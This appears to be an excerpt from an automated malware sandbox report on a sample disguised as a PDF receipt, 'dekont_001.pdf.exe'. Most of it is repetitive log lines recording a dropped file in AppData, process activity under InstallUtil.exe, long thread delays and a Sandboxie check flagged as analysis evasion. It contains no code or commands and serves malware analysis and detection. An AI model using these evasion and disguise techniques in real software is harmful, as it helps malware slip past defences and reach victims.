              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: dekont_001.pdf.exe PID: 7304, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RequiredContract.exe PID: 7844, type: MEMORYSTR
              Source: dekont_001.pdf.exe, 00000000.00000002.1830048122.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.000000000328F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeMemory allocated: 26A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeMemory allocated: 4830000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 10A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2E90000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2BD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeMemory allocated: 2F70000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeMemory allocated: 31E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeMemory allocated: 3110000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1040000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2AD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4AD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599736Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599594Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598891Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598563Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598438Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598216Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598093Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597984Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597547Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597438Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597313Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597202Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596960Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596857Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596744Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596297Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595964Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595637Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595312Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595203Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595094Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594984Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594649Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594294Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594148Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594046Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598780Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598115Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597778Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597125Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596687Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596578Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596468Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596359Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596250Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596140Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596030Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595921Jump to behavior
